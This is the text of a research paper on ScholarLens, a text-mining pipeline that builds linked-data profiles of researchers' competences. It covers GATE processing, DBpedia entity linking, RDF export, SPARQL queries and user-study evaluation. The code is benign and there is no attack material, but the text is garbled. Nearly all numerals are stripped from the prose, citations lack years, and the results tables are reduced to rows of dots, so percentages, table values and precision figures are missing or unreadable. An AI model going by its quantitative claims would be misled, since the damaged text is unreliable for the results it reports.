we leverage various text mining techniques in our semantic profiling workflow. if the input document is in any format other than plain-text, it first goes through a text extraction phase. in this step, any publisher-specific formatting is eliminated from the document. the plain-text document is then prepared for further analysis in a so-called pre-processing phase. this step is language-dependent, but can be reused for documents in various domains. the first step is to break down a document's text into tokens—smaller, linguistically meaningful segments, like words, numbers and symbols. tokens are then grouped into sentences and each word token is tagged with a part-of-speech tag, e.g., 'noun' or 'verb'. to eliminate the different orthographical forms of tokens in a text, we lemmatize the document's text, so that all inflected forms of nouns (singular vs.
plural) and verbs (various tenses) are changed to their canonical form (requirement ). the pre-processed text is subsequently passed onto the semantic processing phase for user competence detection. grounding competence topics to lod resources since it is not feasible to manually construct and maintain a knowledge base of all possible topics appearing in documents, we leverage the linked open data (lod) cloud as a source of continually-updated knowledge. the idea is to link the competence topics to their corresponding resources on the lod cloud, where machine-readable, semantic metadata about each topic can be found by de-referencing the link’s address. to this end, we use a linked data-enabled named entity recognition (ner) tool that can detect named entities in the documents, resolve them to their correct sense and link the surface forms to existing resources in lod datasets (requirement ). grammatical processing performed in the previous step helps us to filter out tokens that do not typically represent competences, like adverbs or pronouns. we exclude processing the sentences in figure and table captions, formulas, section headers and references, as we empirically verified that these document regions rarely contain authors competence topics. knowledge base population as we mentioned earlier, the output of our system is a knowledge base populated with semantic user profiles (requirement ). we leverage the resource description framework (rdf) syntax to describe the extracted information in a semantically meaningful way, using the model described in ‘semantic modeling of user competence records’. in the populated user profiles, we use the raw frequency of the detected topics (named entities) in documents as a means of ranking the top competence topics for each scholar. we store the profile rdf documents in a triplestore that can later on be queried for various applications. an important design decision in modeling the knowledge base is deciding whether all (potentially hundreds) of topics in a document are indeed representative of its authors’ competences. or perhaps, a subset of the topics located in the rhetorical zones of an article are better candidates? previously in sateli & witte ( ), we investigated the detection of rhetorical entities (res) as sentences in a scholarly document that convey its authors findings or argumentations, like their claims or contributions. we also showed how the named entities within the boundaries of these res can represent a document’s content sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure this figure shows a sequence of processing resources aggregated into a gate pipeline for the automatic generation of user profiles based on competences extracted from publications. in various use cases, such as retrieving semantically related articles. additionally, we determined that storing the named entities within res requires an order of a magnitude fewer triples, compared to exporting the topics of the entire document. to test whether the same assumption can be made about the authors’ competence topics, we additionally export all rhetorical entities in a document and add an additional property to each topic (ne) that is mentioned within an re. we will revisit our hypothesis in ‘extended experiments’. implementation in this section, we describe how we realized the semantic user profiling of authors illustrated in the previous section. 
extraction of user competences with text mining we developed a text mining pipeline (fig. ), implemented based on the gate framework (cunningham et al., ), to analyze a given author’s papers in order to automatically extract the competence records and topics. the nlp pipeline accepts a corpus (set of documents) for each author as input. we use gate’s annie plugin to pre-process each document’s full-text and further process all sentences with the hepple part-of- speech (pos) tagger, so that their constituents are labeled with a pos tag, such as noun, verb, or adjective and lemmatized to their canonical (root) form. we then use munpex sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example annotated document for a contribution (rhetoricalentity) and the competence top- ics (dbpedianes) within its boundaries in gate graphical user interface. (http://www.semanticsoftware.info/munpex), a gate plugin to detect noun phrases in text, which helps us to extract competence topics that are noun phrases rather than nouns alone. subsequently, we use our lodtagger (http://www.semanticsoftware.info/lodtagger), which is a gate plugin that acts as a wrapper for the annotation of documents with named entity recognition tools. in our experiments, we use a local installation of dbpedia spotlight (mendes et al., ) v . with the statistical model version (http://spotlight.sztaki.hu/downloads/) for english (en_ + ) (daiber et al., ). spotlight matches the surface form of the document’s tokens against the dbpedia ontology and links them to their corresponding resource uri. lodtagger then transforms the spotlight response to gate annotations using the entities’ offsets in text and keeps their uri in the annotation’s features (fig. ). to evaluate whether our hypothesis that the nes within rhetorical zones of a document are more representative of the author’s competences than the nes that appear anywhere in a document, we decided to annotate the claim and contribution sentences of the documents using our rhetector (http://www.semanticsoftware.info/rhetector) gate plugin (sateli & witte, ). this way, we can create user profiles exclusively from the competence topics that appear within these re annotations for comparison against profiles populated from full-text. rhetector was evaluated in sateli & witte ( ) with an average f-measure of %. finally, we create a competence record between the author and each of the detected competences (represented as dbpedia nes). we use gate’s jape language that allows us to execute regular expressions over documents’ annotations by internally transforming them into finite-state machines. thereby, we create a competence record (essentially, sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/lodtagger http://spotlight.sztaki.hu/downloads/ http://www.semanticsoftware.info/rhetector http://dx.doi.org/ . /peerj-cs. a gate relation) between the author annotation and every competence topic in the document. figure shows example semantic annotations generated by our text mining pipeline in the gate developer environment. automatic population of semantic user profiles the last step in our automatic generation of semantic user profiles is to export all of the gate annotations and relations from the syntactic and semantic processing phases into semantic triples, represented with rdf. our lodexporter (http://www.semanticsoftware. 
info/lodexporter) tool provides a flexible mapping of gate annotations to rdf triples with user-defined transformation rules. for example, the rules:

map:gatecompetence map:gatetype "dbpediane" .
map:gatecompetence map:hasmapping map:gatelodreffeaturemapping .
map:gatelodreffeaturemapping map:gatefeature "uri" .
map:gatelodreffeaturemapping map:type rdfs:isdefinedby .

describe that all 'dbpediane' annotations in the document should be exported, and that for each annotation the value of its 'uri' feature can be used as the object of the triple, using 'rdfs:isdefinedby' as the predicate. similarly, we use the lov terms shown in the table above to model authors, competence records and topics as semantic triples, and store the results in an apache tdb-based (http://jena.apache.org/documentation/tdb/) triplestore.

evaluation

we performed two rounds of evaluations: in a first user study, described in detail in sateli et al. ( ) and summarized below, we tested an initial version of our profiling approach. to investigate the reasons for generated 'irrelevant' profile entries, we went back to a number of users from our study and performed a post-mortem error analysis. our findings are presented in 'user study: error analysis'. based on the detected issues, we refined both our profile generation pipeline and the survey methodology for a second user study. our new setup and the results are described in 'extended experiments'.

methodology and metrics

we evaluate the quality of the generated user profiles through user studies. for each participant, we processed a number of the user's publications and created competence entries in a knowledge base. we then went back to the users and showed them the top- (by competence frequency) generated profile entries in a human-readable format, in order to evaluate whether we found a pertinent competence. to evaluate the effectiveness of our system, we utilize common retrieval evaluation methods, namely precision@k, mean average precision (map) (manning, raghavan & schütze, ) and normalized discounted cumulative gain (ndcg) (järvelin & kekäläinen, ).

we first analyze the top ranked competence results of an individual user, specifically the top- , top- and top- , and measure the precision at rank (precision@k), which is defined as:

precision@k = \frac{1}{k} \cdot \sum_{c=1}^{k} rel(c)

where k denotes the rank of the competence that is considered and rel(c) marks the rating for the iterated position c, which is either 0 for irrelevant or 1 for relevant topics. while precision@k is focused on the result for a certain rank of an individual user, map is a metric that expresses the mean of the average precisions of the competence rankings over all users in one value. map indicates how precisely an algorithm or system ranks its top-k results, assuming that the entries listed on top are more relevant for the information seeker than the lower ranked results. precision is then evaluated at a given cut-off rank k, considering only the top-k results returned by the system. hence, map is the mean of the average precisions at each cut-off rank and represents a measure for computing the quality of a system across several information needs; in our case, users with competences. for all relevant competences per user u, we compute the average precision (ap) of a user u as follows:

ap(u) = \frac{1}{|C_{r,k}|} \sum_{c=1}^{k} precision@c \cdot rel(c)

where rel(c) is 1 if the competence at rank c is relevant and 0 in the opposite case, and C_{r,k} is the set of all relevant competences up to the cut-off rank k. finally, for the set of users U, the map is then defined as follows:

map(U) = \frac{1}{|U|} \sum_{u=1}^{|U|} ap(u)

in contrast to the map, which only considers binary ratings, the dcg computes the ranking based on likert scales (likert, ). given a list of competences, rel_c is the actual rating of each single competence c; for example, in our second user study we assign the ratings 0 (irrelevant), 1 (general), 2 (technical) and 3 (research), as defined below. similar to the precision, the dcg assumes that higher ranked items are more relevant for the users than lower ranked ones. in order to take this into account, a logarithmic decay function is applied to the competences, known as the gains. for a set of users U, let rel_c be the relevance score given to competence c ∈ C for user u ∈ U. then, the dcg for every user, as defined in croft, metzler & strohman ( ), is the sum over all |C| competence gains:

dcg_u = rel_1 + \sum_{c=2}^{|C|} \frac{rel_c}{\log_2 c}

due to the variable length of the result lists, the dcg values should be normalized across all users. therefore, the competences are sorted according to their relevance; the dcg of this ordered list is called the ideal dcg (idcg). finally, this idcg is used to compute the normalized dcg (ndcg) for a user u as follows:

ndcg_u = \frac{dcg_u}{idcg_u}
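the following python sketch computes these metrics exactly as defined above; the example ratings are invented for illustration and do not correspond to any participant in our studies.

import math

def precision_at_k(rels, k):
    # rels: list of binary relevance values (1 = relevant), in the system's ranking order
    return sum(rels[:k]) / k

def average_precision(rels, k):
    # mean of precision@c over the relevant positions c <= k (0 if there are none)
    hits = [precision_at_k(rels, c) for c in range(1, k + 1) if rels[c - 1]]
    return sum(hits) / len(hits) if hits else 0.0

def mean_average_precision(rels_per_user, k):
    return sum(average_precision(r, k) for r in rels_per_user) / len(rels_per_user)

def ndcg(ratings):
    # ratings: graded ratings (e.g., 0-3) in the system's ranking order
    def dcg(rs):
        return rs[0] + sum(r / math.log2(i) for i, r in enumerate(rs[1:], start=2))
    ideal = dcg(sorted(ratings, reverse=True))
    return dcg(ratings) / ideal if ideal > 0 else 0.0

# hypothetical survey ratings for two users' top-5 competences (0=irrelevant ... 3=research)
user_ratings = [[3, 0, 2, 1, 3], [1, 2, 0, 0, 3]]
binary = [[1 if r > 0 else 0 for r in u] for u in user_ratings]  # ratings above irrelevant
print(mean_average_precision(binary, k=5))
print([round(ndcg(u), 3) for u in user_ratings])

the binarization in the example corresponds to the lower of the two relevance thresholds used in the extended experiments below, where every rating above irrelevant counts as relevant.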
for each participant, we measured the average precision of the generated profiles in both the full-text and re-only versions. the results show that for both the top- and top- competences, – % of the profiles generated from re-only zones had a higher precision, increasing the system map up to % in each cut-off. in the top- column, we observed a slight decline in some of the profiles’ average precision, which we believe to be a consequence of more irrelevant topics appearing in the profiles, although the map score stays almost the same for both versions. user study: error analysis in order to refine our approach, we went back to the users from the first study to understand the root cause of competences they marked as irrelevant. we asked a number of users to classify each irrelevant competence into one of four error categories: type (wrong uri). the profile contains a wrong uri: this is typically caused by the linking tool assigning the wrong uri to a surface form; either because it picked the wrong sense among a number of alternatives or the correct sense does not exist in the knowledge base. type (empty description). as explained above, we retrieve the comment for each competence uri to make sure users understand their profile entries. in about % of profile entries, this automatic process failed, leading to an empty description, which was often marked as irrelevant. we identified three main causes for this: (a) a timeout in the sparql query to the public dbpedia endpoint; (b) missing comment entry in sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dbpedia.org/sparql http://dx.doi.org/ . /peerj-cs. table evaluation results for the generated user profiles in the first user study: this table shows the number of distinct competence topics ex- tracted from the ten participants and the average precisions at , and cut-off ranks. the last row (map) shows the mean average precision of the system at various cut-offs. participant #docs #distinct competences avg. precision@ avg. precision@ avg. precision@ full-text res only full-text res only full-text res only full-text res only r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . map . . . . . . english for some resources in the online dbpedia; and the much rarer cause (c) where the uri generated by the linking tool was valid for an older version of dbpedia, but has meanwhile been removed. type (user misunderstanding). some users interpreted the task differently when it came to identifying their competences: rather than evaluating what they are generally competent in, they marked each entry that did not fall into their research fields as irrelevant. for example, a researcher working on web services marked ‘http (protocol)’ as irrelevant, since http was not a research topic in itself, though the user clearly had knowledge about it. type : (unspecific competence). users often assigned irrelevant for competences that were deemed too broad or unspecific. the cause is very similar to type , with the main difference that competences here were high-level concepts, like system, idea, or methodology, whereas type errors were assigned to technical terms, like http, data set, or user (computing). the results of this analysis are summarized in table . as can be seen, the majority of the errors ( % and %) are of type . 
this is consistent with earlier observations we had about dbpedia spotlight when applying it to research literature (sateli & witte, ). modifying or retraining spotlight itself was out of the scope of this work, but we addressed some common errors in our pipeline, as described below. extended experiments with the lessons learned from our first experiment, we enhanced our competence topic detection pipeline to remove the error types iterated in the previous section. in particular, to address type error, we excluded exporting entities with surface forms like ‘‘figure’’ or ‘‘table’’ from newly generated profiles, as these were consistently linked to irrelevant topics like ‘‘figure painting’’ or ‘‘ficus’’. to address type and type errors, we refined the sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table error analysis of the irrelevant competence entries generated for the participants in the first user study: for each error type, the total numbers of irrelevant competences in the profile and its percentage (rounded) is shown. error type user average r r r r r r r ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; fu ll -t ex tp ro fi le s type % % % % % % % % ; ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; r e pr of il es type % % % % % % % % task description shown to participants before they start their evaluation. additionally, we introduced a competence classification to distinguish general competences from technical and research competences. however, to accommodate this classification we dropped the previous assessment of competence levels, as we did not want to double the workload of our study participants. automatic generation of online surveys for our revised experiment, we set up a web-based user profile evaluation system. in the new set up, instead of generating profiles for users, we implemented a survey-style profile generation tool that queries the populated knowledge base and generates web- based profiles compatible with limesurvey (https://www.limesurvey.org), an open source survey application with built-in analytics features, as shown in fig. . similar to the first experiment, we generated two surveys for each user: one with the competence topics extracted from the full-text of documents and one with topics extracted from the rhetorical zones only. to lessen the priming bias—where participants may think topics shown earlier in the survey must be more relevant to them—we randomized the order of survey questions and informed the users in the evaluation instructions about this fact. however, we internally kept the original rank of the competence topics shown in survey questions as they appear in the knowledge base profiles, so that we can compute the precision of our system in top- k cut-off ranks. we invited computer scientists to participate in our user evaluations. in total, users responded to the survey (note that an anonymized user like ‘r ’ from the second study is not necessarily the same person as in the first study). in contrast to the sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.limesurvey.org http://dx.doi.org/ . /peerj-cs. 
figure an automatically generated web-based survey using limesurvey: (a) depicts the instructions shown to participants to explain the sur- vey motivation and how to select a competence level, and (b) shows an example competency question with an interactive response interface. previous survey, this time we asked the users to rate the competences along three different competence types, namely general which comprises very general and broad topics such as ‘‘system’’ or ‘‘number’’, technical which refers to skills a computer scientist needs in daily work, e.g., ‘‘hypertext transfer protocol’’, and research, which points to research topics a user has been or currently is involved in, e.g., ‘‘linked data’’. result computation all responses were exported into comma-separated value (csv) files and analyzed with our own java-based command-line tool, transforming the original horizontal schema into a vertical structure, based on their original rank. we computed the precision@rank, the mean average precision (map) and the normalized discounted cumulative gain (ndcg), according to the equations presented above (‘methodology and metrics’). table presents the responses for both versions, the full-text profiles and re zones, with respect to the overall ratings across the four different competence levels. the results for the precision metrics are displayed in tables and . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table analysis of the survey responses for profiles generated from full-text and re zones. the values shown in the columns are number of competence types as voted by the survey participants. user competence type in full-text competence type in re zones general technical research irrelevant general technical research irrelevant r r r r r r r r r r r r r r r r r r r r r r r r r total . % . % . % . % . % . % . % . % since precision@k and map are based on binary ratings (relevant/non-relevant), it has to be specified which competence levels to take into account. therefore, we defined two thresholds: irrelevant (threshold ‘ ’) and general (threshold ‘ ’). for threshold ‘ ’, we treated the responses in the general, technical and research competence types as relevant. in this case, only irrelevant entries are counted as errors. however, this might not be appropriate for every application: some use cases might want to also exclude competences in the general category. therefore, we also analyzed the results for ratings above general, in order to ensure an equal distribution (tables and ). here, competences were only considered as relevant when they were rated either as technical or research. additionally, we computed the ndcg for each profile, which does not penalize for irrelevant competence topics in profiles. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table precision computation for profiles generated from full-text with a relevance threshold of irrelevant ( ) and general ( ). all ratings above irrelevant ( ) and general ( ) have been considered as relevant, respectively. user threshold —irrelevant threshold —general ndcg average precision precision@k average precision precision@k ap@ ap@ ap@ p@ p@ p@ ap@ ap@ ap@ p@ p@ p@ r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . 
. . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . mean average precision average mean average precision average . . . . . . . . . . . . . discussion overall, compared to our first user study, our enhanced method resulted in fewer irrelevant results in the user profiles. this is partially due to the improvements mentioned above, where we removed irrelevant entries that affected every generated profile (e.g., the competency entries derived from the word ‘‘figure’’). we also analyzed the distribution of competence topic types in each user profile (fig. ). in both profile versions, about – % of the detected competences were rated either as technical or research, which corroborates our hypothesis that the named entities in users’ publications are representative of their research expertise. in comparison with the full-text and re-only version of each user profile, although we observe an increase in the number of irrelevant topics, majority of them fall into the research and technical types. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table precision computation for profiles generated from re zones with a relevance threshold of irrelevant ( ) and general ( ). all ratings above irrelevant ( ) and general ( ) have been considered as relevant, respectively. user threshold —irrelevant threshold —general ndcg average precision precision average precision precision ap@ ap@ ap@ p@ p@ p@ ap@ ap@ ap@ p@ p@ p@ r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . mean average precision average mean average precision average . . . . . . . . . . . . . these results are also consistent with our hypothesis that the topics in rhetorical zones of scholarly literature, like claims and contributions of authors are strong indications of their competence. as we can see from the results, the full-text profiles returned less irrelevant results and more higher ratings ( %) than the re-only version ( %). a closer look on individual responses revealed that the error (type (wrong uri)) occurred more often in the re-only version. a wrong matching of extracted terms to uris mainly causes a wrong description and hence an irrelevant result. longer and more comprehensive text passages, as in the full-text profiles, might better compensate this problem and therefore result in less uri mismatches. too broad and general competences are a further issue when looking at the ratings. 
again, the reason is that dbpedia spotlight does not distinguish between composite and single terms, for instance, ''service'' and ''service provider''. it finds successful matches for both terms and thus produces general topics.

figure: the two plots show the distribution of top- competence types (general, technical, research, irrelevant) in full-text (a) and re-only (b) profiles from the evaluation survey responses.

we also evaluated the rated competences with respect to their ranking in the result list. both metrics, precision@k and mean average precision, have been computed across two relevance thresholds. threshold '0' denotes the results where all ratings above irrelevant were considered as relevant, namely general, technical and research. since this division favours relevant competences, we additionally computed the precision@k and mean average precision for ratings above general (threshold '1'). among the top- results, the re-only profiles performed slightly better for threshold '0', which indicates that the relevant competences are a bit more likely to appear in the top- results than in the full-text profiles. however, the ranking results turn upside down for the top- results, where the map value for the full-text version is significantly higher than for the re-only version. this reveals that the ranking in full-text profiles is more stable across competences compared to re zones.
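for reproducibility, the reshaping of the survey export from a horizontal into a vertical layout and the application of the two relevance thresholds discussed above can be sketched in python with pandas; the column names and example ratings below are assumptions, since the actual limesurvey export schema differs.

import pandas as pd

# hypothetical export: one row per participant, one column per ranked competence
df = pd.DataFrame({
    "user":   ["r1", "r2"],
    "rank_1": ["research", "general"],
    "rank_2": ["irrelevant", "technical"],
    "rank_3": ["technical", "research"],
})

# horizontal -> vertical: one row per (user, rank, rating)
long = df.melt(id_vars="user", var_name="rank", value_name="rating")
long["rank"] = long["rank"].str.replace("rank_", "").astype(int)
long = long.sort_values(["user", "rank"])

# map the competence types to graded scores and binarize for the two thresholds
scale = {"irrelevant": 0, "general": 1, "technical": 2, "research": 3}
long["score"] = long["rating"].map(scale)
long["relevant_t0"] = (long["score"] > 0).astype(int)  # above 'irrelevant'
long["relevant_t1"] = (long["score"] > 1).astype(int)  # above 'general'
print(long)

the two binary columns can then be fed directly into the precision@k and map computations sketched earlier, while the graded score column is used for the ndcg.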
to mitigate this effect, when choosing our sample group, we tried to be inclusive of researchers from various computer science sub-disciplines, including those who work in inter-disciplinary areas, such as bioinformatics. we also tried to include both young researchers and senior scientists with a larger number of selected publications. although the evaluation is admittedly not definitive, our results show the effectiveness and accuracy of our method for the automatic creation of scholarly profiles. at its current stage, we believe that the open source implementation of our approach will facilitate others to collect further empirical evidence, by integrating scholarlens into various scholarly applications. application examples as one of our main contributions in this paper is an open source library for generating semantic user profiles from scholarly articles, we want to demonstrate how various end-user applications can incorporate the generated user profiles. towards this end, in this section we present a number of use cases for exploiting the knowledge base generated by scholarlens. finding all competences of a user by querying the populated knowledge base with the researchers’ profiles, we can find all topics that a user is competent in. following our knowledge base schema (see ‘design’), we can query all the competence records of a given author uri and find the topics (in form of lod uris), from either the papers’ full-text or exclusively the re zones. in fact, the sparql query shown below is how we gathered each user’s competences (from re zones) to generate the evaluation profiles described in ‘evaluation’: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table example response for finding all competence topics of a user. the ‘extracted competence topics’ column lists the topics as linked entities on the web of lod. the competence topics are sorted by their raw frequency in the user profile, in descending order. user extracted competence topics r dbpedia:tree_(data_structure), dbpedia:vertex_(graph_theory), dbpedia:cluster_analysis, ... r dbpedia:natural_language_processing, dbpedia:semantic_web, dbpedia:entity- relationship_model, ... r dbpedia:recommender_system, dbpedia:semantic_web, dbpedia:web_portal, dbpedia:biodiversity, ... r dbpedia:service_(economics), dbpedia:feedback, dbpedia:user_(computing), dbpedia:system, ... r dbpedia:result, dbpedia:service_discovery, dbpedia:web_search_engine, dbpedia:internet_protocol, ... select distinct ?uri (count(?uri) as ?count) where { ?creator rdf:type um:user . ?creator rdfs:isdefinedby <http://semanticsoftware.info/lodexporter/creator/r > . ?creator um:hascompetencyrecord ?competencerecord . ?competencerecord c:competencefor ?competence . ?competence rdfs:isdefinedby ?uri . ?rhetoricalentity rdf:type sro:rhetoricalelement . ?rhetoricalentity pubo:containsne ?competence . } group by ?uri order by desc(?count) table shows a number of competence topics (grounded to their lod uris) for some of our evaluation participants, sorted in descending order by their frequency in the documents. ranking papers based on a user’s competences semantic user profiles can be incredibly effective in the context of information retrieval systems. here, we demonstrate how they can help to improve the relevance of the results. our proposition is that papers that mention the competence topics of a user are more interesting for her and thus, should be ranked higher in the results. 
therefore, the diversity and frequency of topics within a paper should be used as ranking features. we showed in sateli & witte ( ) that retrieving papers based on their lod entities is more effective than conventional keyword-based methods. however, the results were not presented in order of their interestingness for the end-user. here, we integrate our semantic user profiles to re-rank the results, based on the common topics in both the papers and a user’s profile: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. select (count(distinct ?uri) as ?rank) where { <http: //example.com/example_paper.xml> pubo:hasannotation ?topic . ? topic rdf:type pubo:linkednamedentity . ? topic rdfs:isdefinedby ?uri . filter exists { ? creator rdfs:isdefinedby <http: // semanticsoftware . info / lodexporter / creator /r > . ? creator um:hascompetencyrecord ?competencerecord . ?competencerecord c:competencefor ?competence . ?competence rdfs:isdefinedby ?uri .} } the query shown above compares the topic uris in a given paper to user r ’s competences extracted from full-text documents and counts the occurrence of such a hit. note that the distinct keyword will cause the query to only count the unique topics, e.g., if <dbpedia:semantic_web> appears two times in the paper, it will be counted as one occurrence. we decided to count the unique occurrences, because a ranking algorithm based on the raw frequency of competence topics will favour long (non-normalized) papers over shorter ones. we can then use the numbers returned by the query above as a means to rank the papers. table shows the result set returned by performing a query against the sepublica dataset of papers from (sateli & witte, ) to find papers mentioning <dbpedia:ontology_(information_science)>. the ‘‘topic mentions’’ column shows the ranked results based on how many times the query topic was mentioned in a document. in contrast, the r and r profile-based columns show the ranked results using the number of common topics between the papers (full-text) and the researchers’ respective profiles (populated from their own publications full-text). note that in the r and r profile-based columns, we only count the number of unique topics and not their frequency. an interesting observation here is that the paper ranked fourth in the frequency-based column ranks last in both profile-based result sets. a manual inspection of the paper revealed that this document, although originally ranked high in the results, is in fact an editors’ note in the preface of the sepublica proceedings. on the other hand, the paper which ranked first in the frequency-based column, remained first in r ’s result set, since this user has a stronger research focus on ontologies and linked open data compared to r , as we observed from their generated profiles during evaluation. finding users with related competences given the semantic user profiles and a topic in form of an lod uri, we can find all users in the knowledge base that have related competences. by virtue of traversing the lod cloud, we can find topic uris that are (semantically) related to a given competence topic and match against users’ profiles to find competent authors: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
table personalized re-ranking of search results: this tables shown how integration of semantic user profiles for researchers r and r affects ranking of the top- results originally retrieved and sorted by a frequency-based method. paper title topic mentions r ’s profile r ’s profile rank raw frequency rank com. topics rank com. topics ‘‘a review of ontologies for describing scholarly and scientific documents’’ ‘‘baudenkmalnetz—creating a semantically annotated web resource of historical buildings’’ ‘‘describing bibliographic references’’ in rdf ‘‘semantic publishing of knowledge about amino acids’’ ‘‘supporting information sharing for re-use and analysis of scientific research publication data’’ ‘‘linked data for the natural sciences: two use cases in chemistry and biology’’ ‘‘ornithology based on linking bird observations with weather data’’ ‘‘systematic reviews as an interface to the web of (trial) data: using pico as an ontology for knowledge synthesis in evidence-based healthcare research’’ ‘‘towards the automatic identification of the nature of citations’’ ‘‘smart research using linked data—sharing research data for integrated water resources management in the lower jordan valley’’ prefix dcterms: <http: // purl .org/dc/terms/> prefix dbpedia: <http: //dbpedia.org/ resource /> select ?author_uri where { service <http://dbpedia.org/ sparql> { dbpedia:ontology_(information_science ) dcterms:subject ? category . ? subject dcterms:subject ? category . } ?author rdf:type um:user . ? creator rdfs:isdefinedby ?author_uri . ? creator um:hascompetencyrecord ?competencerecord. ?competencerecord c:competencefor ?competence. ?competence rdfs:isdefinedby ? subject . ? rhetoricalentity pubo:containsne ?competence. ? rhetoricalentity rdf:type sro:rhetoricalelement . } the query above first performs a federated query against dbpedia’s sparql endpoint to find topic uris that are semantically related to the query topic (we assume all topics under the same category in the dbpedia ontology are semantically related). then, it matches the retrieved uris against the topics of the knowledge base users’ sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table by virtue of traversing the web of lod, topics semantically-related to the query are inferred and their respective competent researchers are shown in the ‘competent users’ column. competence topic competent users dbpedia:ontology_(information_science) r , r , r , r dbpedia:linked_data r , r , r dbpedia:knowledge_representation_and_reasoning r , r , r , r dbpedia:semantic_web r , r , r , r , r , r , r , r dbpedia:controller_vocabulary r , r , r dbpedia:tree_(data_structure) r , r , r competence records. as shown in table , with this approach we can find a researcher competent in <dbpedia:ontology_(information_science)>, even when this topic is not mentioned directly in her profile, but only has <dbpedia:linked_data>, since both of the aforementioned topics are related in the dbpedia ontology. in other words, if we are looking for persons competent in ontologies, a researcher that has previously conducted research on linked data might also be a suitable match. conclusions we presented semantic user profiles as the next important extension for semantic publishing applications: with a standardized, shareable, and extendable representation of a user’s competences, a number of novel application scenarios now becomes possible. 
for example, searching for scientists with specific competences can help to find reviewers for a given paper or proposal. recommendation algorithms can filter and rank the immense amount of research objects, based on the profile of an individual user. a wealth of additional applications becomes feasible, such as matching the competences of a research group against project requirements, simply by virtue of analyzing an inter-linked knowledge graph of users, datasets, publications, and other artifacts. we showed how these ideas can be realized with semantic scholarly profiles that are based on a linked open data-compliant format. to enable the next generation of scholarly applications, we developed a method for the automatic construction of open knowledge bases with semantic user profiles. our method is implemented in form of the open source scholarlens library, which can be easily integrated into existing or new scholarly systems. an important part of our work is the automatic generation of the user profiles through a text mining pipeline, which helps to overcome the well-known cold start problem in user profiling. unlike other existing approaches, scholarlens populates a knowledge base compliant with the web of linked data, which facilitates connecting the semantic user profiles with other domain- and application-specific information. we demonstrated how such a knowledge base can be exploited for various use cases, using standard sparql queries. based on the results of two rounds of user studies, we can conclude that the generated profiles represent the competences of scientists with a very high accuracy. evaluating the impact of these profiles on different, concrete tasks is the next logical step in this research. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. towards this end, we are currently integrating our profile knowledge base into a scholarly data portal for biodiversity research, in order to evaluate their impact on concrete research questions in a life sciences scenario. additional information and declarations funding this work was partially funded by an nserc discovery grant. this work was also supported by the daad (german academic exchange service) through the ppp canada program and by the dfg (german research foundation) within the gfbio project. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. competing interests the authors declare there are no competing interests. author contributions • bahar sateli, felicitas löffler and rené witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • birgitta könig-ries conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: semantic software: http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements. github: https://github.com/semanticsoftwarelab/scholarlens. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abel f, gao q, houben g-j, tao k. . 
